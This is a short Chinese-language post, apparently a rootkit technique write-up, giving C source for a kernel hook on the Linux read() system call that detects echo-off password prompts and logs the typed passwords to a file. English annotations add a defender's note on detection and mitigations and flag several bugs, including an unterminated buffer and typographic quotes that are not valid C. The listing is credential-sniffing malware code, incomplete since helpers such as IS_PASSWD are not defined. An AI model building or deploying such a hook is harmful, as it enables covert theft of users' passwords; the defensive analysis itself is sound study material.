作者:wzt
unix系统在输入密码的时候, 都会关闭终端回显, 利用这个特性, 就可以判断当终端属性改变的时候, 就可能是一次密码输入的过程, 当前read系统调用的buff中, 就是存放密码的内容。 代码片段如下:
/*
 * Replacement handler for the read() system call (analyst annotation).
 *
 * Calls the saved original handler, then, when the read returned data
 * and the calling process has a controlling tty for which IS_PASSWD()
 * holds, formats "<process name> -- passwd: <bytes read>" into a stack
 * buffer and hands it to write_to_file() for SNIFF_LOG.  The text above
 * the listing says IS_PASSWD() is meant to recognise the echo-off tty
 * state a password prompt uses; IS_PASSWD, orig_read, write_to_file and
 * SNIFF_LOG themselves are not defined on this page.
 *
 * Defender's note: this is a credential-capture pattern.  Observable
 * artefacts visible from the code are a redirected read() entry (the
 * saved pointer orig_read), a kernel module doing file writes on the
 * read path, and a log file that receives raw tty input.  Signed/locked
 * down modules, syscall-table integrity checks and alerting on unsigned
 * module loads are the usual mitigations.
 *
 * @param fd     file descriptor passed by the caller of read().
 * @param buf    caller's user-space destination buffer.
 * @param count  number of bytes requested.
 * @return       whatever the original read() returned (byte count or
 *               negative error); the hook never alters it.
 */
asmlinkage ssize_t new_read(unsigned int fd, char __user * buf, size_t count)
{
ssize_t ret;
/* Run the real read() first; the hook only observes its result. */
ret = (orig_read)(fd, buf, count);
/* Only successful reads that returned at least one byte are inspected. */
if (ret > 0) {
struct task_struct *tsk = current;
struct tty_struct *tty = NULL;
/* buff is a fixed 200-byte kernel-stack buffer for the formatted log line. */
char *tmp_buf = NULL, buff[200];
/* The lock is commented out: concurrent readers are not serialised here. */
//spin_lock(&tty_sniff_lock);
/* Exactly ret bytes are allocated; no room is reserved for a terminator. */
tmp_buf = (char *)kmalloc(ret, GFP_ATOMIC);
if (!tmp_buf)
return ret;
/* Return value (bytes NOT copied) is ignored, and the copy is never NUL-terminated. */
copy_from_user(tmp_buf, buf, ret);
/* Controlling tty of the calling process, via its signal struct. */
tty = tsk->signal->tty;
/* IS_PASSWD() is defined elsewhere; presumably it tests the tty's echo flag. */
if (tty && IS_PASSWD(tty)) {
/* NOTE(review): the quote marks and dash below are typographic as rendered on
 * this page ("..." and "--" in the source, presumably); they are not valid C. */
snprintf(buff, sizeof(buff),
“<process: %s>\t–\tpasswd: %s\n”, tsk->comm, tmp_buf);
/* write_to_file() is not on this page; it persists the line to SNIFF_LOG. */
write_to_file(SNIFF_LOG, buff, strlen(buff));
}
kfree(tmp_buf);
//spin_unlock(&tty_sniff_lock);
}
return ret;
}
